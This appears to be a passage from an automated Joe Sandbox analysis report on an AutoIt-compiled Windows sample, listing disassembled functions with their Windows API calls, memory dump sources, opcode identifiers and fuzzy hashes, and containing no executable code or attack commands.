              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CapsDevice$Release
              • String ID:
              • API String ID: 1035833867-0
              • Opcode ID: 76eabd7d5670af19740b4cf0828191f4f75e8da2679fba080eb5bd5d5bf2d6e3
              • Instruction ID: 2e758272dbe18e8a85b09aafdbf5d1e91300496cf326e1cbe9440c3b58ecdc2d
              • Opcode Fuzzy Hash: 76eabd7d5670af19740b4cf0828191f4f75e8da2679fba080eb5bd5d5bf2d6e3
              • Instruction Fuzzy Hash: 65018FB5A00718BBEB119BA5DC49A5EBFB8FB48351F048066FA05A7281D6B49800CBA4
              Function 006D1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
              Download Yara Rule
              APIs
              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006D1BF4
              • MapVirtualKeyW.USER32(00000010,00000000), ref: 006D1BFC
              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006D1C07
              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006D1C12
              • MapVirtualKeyW.USER32(00000011,00000000), ref: 006D1C1A
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 006D1C22
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Virtual
              • String ID:
              • API String ID: 4278518827-0
              • Opcode ID: f8f573ff264a3accc1374b1108628eac8e54e81d8ab5dede308f89756a343562
              • Instruction ID: 04f8397cd30ee4ca6652d0ca47f51ccfab23aec15ea65f99ff32b51637731597
              • Opcode Fuzzy Hash: f8f573ff264a3accc1374b1108628eac8e54e81d8ab5dede308f89756a343562
              • Instruction Fuzzy Hash: B50148B090275A7DE3008F5A8C85A52FEA8FF19354F00415B915C47941C7F5A864CBE5
              Function 0073EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
              Download Yara Rule
              APIs
              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0073EB30
              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0073EB46
              • GetWindowThreadProcessId.USER32(?,?), ref: 0073EB55
              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0073EB64
              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0073EB6E
              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0073EB75
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
              • String ID:
              • API String ID: 839392675-0
              • Opcode ID: 97f5b6ac5880c7a9c23156c82bb810a0581617701c6eb053d980895b06a0684a
              • Instruction ID: e84d1ee2c240ca9e514bce230c3ac318a71878f39679f3d13464842d4fe44adc
              • Opcode Fuzzy Hash: 97f5b6ac5880c7a9c23156c82bb810a0581617701c6eb053d980895b06a0684a
              • Instruction Fuzzy Hash: BCF01DB2140258BBE6226752DC0EEBB7A7CEFCAB11F008158F642E119196E85A0186B9
              Function 00727439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
              Download Yara Rule
              APIs
              • GetClientRect.USER32(?), ref: 00727452
              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00727469
              • GetWindowDC.USER32(?), ref: 00727475
              • GetPixel.GDI32(00000000,?,?), ref: 00727484
              • ReleaseDC.USER32(?,00000000), ref: 00727496
              • GetSysColor.USER32(00000005), ref: 007274B0
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ClientColorMessagePixelRectReleaseSendWindow
              • String ID:
              • API String ID: 272304278-0
              • Opcode ID: 56e8d662c2ec022928b0fc2c3a009533f9be6e994307af506aef4df51e9a94cc
              • Instruction ID: dcf92beec899307d520581f1c77654c3c05a388ef2c6bbd20112727ae290b071
              • Opcode Fuzzy Hash: 56e8d662c2ec022928b0fc2c3a009533f9be6e994307af506aef4df51e9a94cc
              • Instruction Fuzzy Hash: D801AD31400355EFEB126FA4EC08BBA7BB5FF04311F608060F956A21A1CB791E51EB54
              Function 00731874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
              Download Yara Rule
              APIs
              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0073187F
              • UnloadUserProfile.USERENV(?,?), ref: 0073188B
              • CloseHandle.KERNEL32(?), ref: 00731894
              • CloseHandle.KERNEL32(?), ref: 0073189C
              • GetProcessHeap.KERNEL32(00000000,?), ref: 007318A5
              • HeapFree.KERNEL32(00000000), ref: 007318AC
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
              • String ID:
              • API String ID: 146765662-0
              • Opcode ID: c1923dbc58f787326767a73917f90bf901ac767ab05dcdeec0e15f16198bfdc0
              • Instruction ID: 141c59215779c5d4788b32c57112b7e50769a73c984b7c135b9074fcd14691a2
              • Opcode Fuzzy Hash: c1923dbc58f787326767a73917f90bf901ac767ab05dcdeec0e15f16198bfdc0
              • Instruction Fuzzy Hash: D1E0ED76004205BBDB026FA2ED0C915BF39FF4A722710C221F26691170CBB65420DF64
              Function 006DBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
              Download Yara Rule
              APIs
              • __Init_thread_footer.LIBCMT ref: 006DBEB3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: D%z$D%z$D%z$D%zD%z
              • API String ID: 1385522511-3299656855
              • Opcode ID: 1820b6924b1cda8e42478be900116b557a273e6a701fc6d5d1c3541a110da116
              • Instruction ID: 76cdcd034df3da95fbb41347c63be535bc09ddb897b6cc40f19f547912ba22df
              • Opcode Fuzzy Hash: 1820b6924b1cda8e42478be900116b557a273e6a701fc6d5d1c3541a110da116
              • Instruction Fuzzy Hash: 69913975E0020ACFCB18CF59C0906A9B7F2FF99310B25916ED945AB355E731E982CB90
              Function 00757B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006F0242: EnterCriticalSection.KERNEL32(007A070C,007A1884,?,?,006E198B,007A2518,?,?,?,006D12F9,00000000), ref: 006F024D
                • Part of subcall function 006F0242: LeaveCriticalSection.KERNEL32(007A070C,?,006E198B,007A2518,?,?,?,006D12F9,00000000), ref: 006F028A
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
                • Part of subcall function 006F00A3: __onexit.LIBCMT ref: 006F00A9
              • __Init_thread_footer.LIBCMT ref: 00757BFB
                • Part of subcall function 006F01F8: EnterCriticalSection.KERNEL32(007A070C,?,?,006E8747,007A2514), ref: 006F0202
                • Part of subcall function 006F01F8: LeaveCriticalSection.KERNEL32(007A070C,?,006E8747,007A2514), ref: 006F0235
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
              • String ID: +Tr$5$G$Variable must be of type 'Object'.
              • API String ID: 535116098-3922178991
              • Opcode ID: 0854f99a450e2d71757cd8f558c412b4f6020a085e3a82e677368634d6cc63e7
              • Instruction ID: 2206e359d11c50ddeb99546b003d16ca6d0b0d8ef8046fee7470b2ae0cee4b54
              • Opcode Fuzzy Hash: 0854f99a450e2d71757cd8f558c412b4f6020a085e3a82e677368634d6cc63e7
              • Instruction Fuzzy Hash: 33916E70A04209EFCB08EF54E8959FDB7B6BF45301F108059FC069B292DBB9AE49CB51
              Function 0073C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D7620: _wcslen.LIBCMT ref: 006D7625
              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0073C6EE
              • _wcslen.LIBCMT ref: 0073C735
              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0073C79C
              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0073C7CA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ItemMenu$Info_wcslen$Default
              • String ID: 0
              • API String ID: 1227352736-4108050209
              • Opcode ID: 59dfcd48fa876ac005c23a0aba2189b083c1abbeb38f14573035949fb732ae67
              • Instruction ID: e5643bfa15046385d4a978f1d28c96324a376140dacba306339e2fa206df9a4f
              • Opcode Fuzzy Hash: 59dfcd48fa876ac005c23a0aba2189b083c1abbeb38f14573035949fb732ae67
              • Instruction Fuzzy Hash: 4751E2726043409BF7529F28C885B6B77E8AF89310F040A2DF996F31A2DB78DD04CB56
              Function 0075AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
              Download Yara Rule
              APIs
              • ShellExecuteExW.SHELL32(0000003C), ref: 0075AEA3
                • Part of subcall function 006D7620: _wcslen.LIBCMT ref: 006D7625
              • GetProcessId.KERNEL32(00000000), ref: 0075AF38
              • CloseHandle.KERNEL32(00000000), ref: 0075AF67
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseExecuteHandleProcessShell_wcslen
              • String ID: <$@
              • API String ID: 146682121-1426351568
              • Opcode ID: c1b7368c736839eaabeb92469f130d4b519100d62addbaf9cd4a0ac1d4f944bb
              • Instruction ID: b2ca69c7a6418ea6f542347675365c20de0372fe578b24fc5c439158ad828611
              • Opcode Fuzzy Hash: c1b7368c736839eaabeb92469f130d4b519100d62addbaf9cd4a0ac1d4f944bb
              • Instruction Fuzzy Hash: 18715971A00219DFCB14DF54D485A9EBBF1BF08310F0485AEE816AB392DB74ED45CB95
              Function 0073719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
              Download Yara Rule
              APIs
              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00737206
              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0073723C
              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0073724D
              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007372CF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorMode$AddressCreateInstanceProc
              • String ID: DllGetClassObject
              • API String ID: 753597075-1075368562
              • Opcode ID: 8fae348152053146573f0432cfc1cf529a9a94566f8e5d63617a85e3d866545e
              • Instruction ID: c411d1eb9db18e9f20f84f30a2d6589b7704a4370115330de7fa7a5e61e04184
              • Opcode Fuzzy Hash: 8fae348152053146573f0432cfc1cf529a9a94566f8e5d63617a85e3d866545e
              • Instruction Fuzzy Hash: E5411DF2604205DFEB29CF54C884A9B7BB9FF49310F1580A9BD059F20AD7B9D944DBA0
              Function 00762F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00762F8D
              • LoadLibraryW.KERNEL32(?), ref: 00762F94
              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00762FA9
              • DestroyWindow.USER32(?), ref: 00762FB1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$DestroyLibraryLoadWindow
              • String ID: SysAnimate32
              • API String ID: 3529120543-1011021900
              • Opcode ID: 0eebaf71a50527c5f26ccc9d03f3d60966a4ab20ceea4e55203df512bd9c4897
              • Instruction ID: adec3db30a13d66e342eb2a37a270546e534539d3a460560a75e3227ef2b74ea
              • Opcode Fuzzy Hash: 0eebaf71a50527c5f26ccc9d03f3d60966a4ab20ceea4e55203df512bd9c4897
              • Instruction Fuzzy Hash: 7621DE71204605ABEB514FA4DC80EFB37B9EF59364F108618FE52D61A1C7B9DC429B60
              Function 006F4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006F4D1E,007028E9,?,006F4CBE,007028E9,007988B8,0000000C,006F4E15,007028E9,00000002), ref: 006F4D8D
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006F4DA0
              • FreeLibrary.KERNEL32(00000000,?,?,?,006F4D1E,007028E9,?,006F4CBE,007028E9,007988B8,0000000C,006F4E15,007028E9,00000002,00000000), ref: 006F4DC3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: a049f690f4cbf51a17be44465992fd00fb22dc04e0f73f63edc27ef81d521838
              • Instruction ID: 258562cd605416a438d072dd977abc58dd594bffcc21d92d8f0b54901819460e
              • Opcode Fuzzy Hash: a049f690f4cbf51a17be44465992fd00fb22dc04e0f73f63edc27ef81d521838
              • Instruction Fuzzy Hash: 71F0813050020CABDB159B94DC09BFEBBA5EF44751F004095E90AA2650DB745D40CAD4
              Function 0072D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32 ref: 0072D3AD
              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0072D3BF
              • FreeLibrary.KERNEL32(00000000), ref: 0072D3E5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Library$AddressFreeLoadProc
              • String ID: GetSystemWow64DirectoryW$X64
              • API String ID: 145871493-2590602151
              • Opcode ID: 82e93b54213b02991a579f62d4f93873eb9722f67e68129a711be70db5532b82
              • Instruction ID: f08101681890dacfcaccd71e2aff04959e5da7f0330e2420a7c3307487db59af
              • Opcode Fuzzy Hash: 82e93b54213b02991a579f62d4f93873eb9722f67e68129a711be70db5532b82
              • Instruction Fuzzy Hash: A1F055B0802730CBE736AB11EC189BD7351BF02701F68C196F843E1002DB6CCE408687
              Function 006D4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,006D4EDD,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E9C
              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006D4EAE
              • FreeLibrary.KERNEL32(00000000,?,?,006D4EDD,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4EC0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Library$AddressFreeLoadProc
              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
              • API String ID: 145871493-3689287502
              • Opcode ID: 9d5ce33633201b8f879a8db36e3ca157817e20daa987039bf88cb54275b40043
              • Instruction ID: 0f5f9f2ec540540f642a2e679f1964a5c1bae3f48832e1a6788cdcc52f817ce8
              • Opcode Fuzzy Hash: 9d5ce33633201b8f879a8db36e3ca157817e20daa987039bf88cb54275b40043
              • Instruction Fuzzy Hash: 18E0CD75E017226BD23317257C18BBF7755AF82F627094116FC46D2300DFB8CD0140A4
              Function 006D4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00713CDE,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E62
              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006D4E74
              • FreeLibrary.KERNEL32(00000000,?,?,00713CDE,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4E87
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Library$AddressFreeLoadProc
              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
              • API String ID: 145871493-1355242751
              • Opcode ID: 659d644e2e34fd384737fe50803d7a64dc8530789483f8d4ce3e1997e85353df
              • Instruction ID: 1e287c962f316968d2365e3f51110a7c30c07a87d38941802b722ec1666283b7
              • Opcode Fuzzy Hash: 659d644e2e34fd384737fe50803d7a64dc8530789483f8d4ce3e1997e85353df
              • Instruction Fuzzy Hash: 92D0C271902761674A231B24BC08DEB3B1AAFC6B513054212F846A2310CFB8CD0181D4
              Function 0075A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
              Download Yara Rule
              APIs
              • GetCurrentProcessId.KERNEL32 ref: 0075A427
              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0075A435
              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0075A468
              • CloseHandle.KERNEL32(?), ref: 0075A63D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$CloseCountersCurrentHandleOpen
              • String ID:
              • API String ID: 3488606520-0
              • Opcode ID: 49fb00e88d3e66cb24ea3d85d9bedd10df30d1bc6a6037cd988eb96f26e84563
              • Instruction ID: 5b76c2fdd5220a04bbe4d7147e2f0f6785f7009a9cc21663cc82b71276b17e58
              • Opcode Fuzzy Hash: 49fb00e88d3e66cb24ea3d85d9bedd10df30d1bc6a6037cd988eb96f26e84563
              • Instruction Fuzzy Hash: C8A1B071604301AFD760DF24C882F6AB7E6AF84714F14891DF99A9B392D7B4EC44CB86
              Function 0070BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00773700), ref: 0070BB91
              • WideCharToMultiByte.KERNEL32(00000000,00000000,007A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0070BC09
